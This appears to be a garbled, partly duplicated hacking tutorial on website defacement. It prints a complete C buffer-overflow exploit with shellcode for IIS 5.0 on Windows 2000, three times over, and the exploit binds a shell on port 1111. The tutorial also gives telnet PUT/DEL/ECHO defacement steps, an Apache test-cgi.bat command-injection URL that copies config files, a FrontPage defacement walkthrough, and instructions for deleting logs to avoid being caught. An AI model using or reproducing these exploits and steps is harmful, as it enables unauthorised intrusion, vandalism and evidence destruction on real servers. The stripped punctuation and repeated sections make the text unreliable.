include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 6
uploaded to the server and downloaded from the server through
the HTTP protocol
NOTE Files can be uploaded to the server and downloaded from
the server through the HTTP protocol without the need of any type
of authentication
Well this was technique was employed and executed years ago
Soon computer enthusiaists realized that this kind of technique
was a huge security threat So they developed new techniques to
subdue the security threat Nowadays web servers are designed
and configured as such to give write access to only selected virtual
directories
TIP Try telnetting a web server and find out some good
information about the server and its behavior
Now I am going to explain some commonly used commands
supported by a web server
GET It is used to send requests for read access to a file residing
on the server by the browser (client)
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
GET indexhtml HTTP11rnrn
Sidetrack The HTML (Hyper text markup language) source code of
indexhtml page occupying on the server will be regressed or if
requested for ASP or PHP or any server side executable page then
the dynamically generated HTML page will be shown
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 7
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
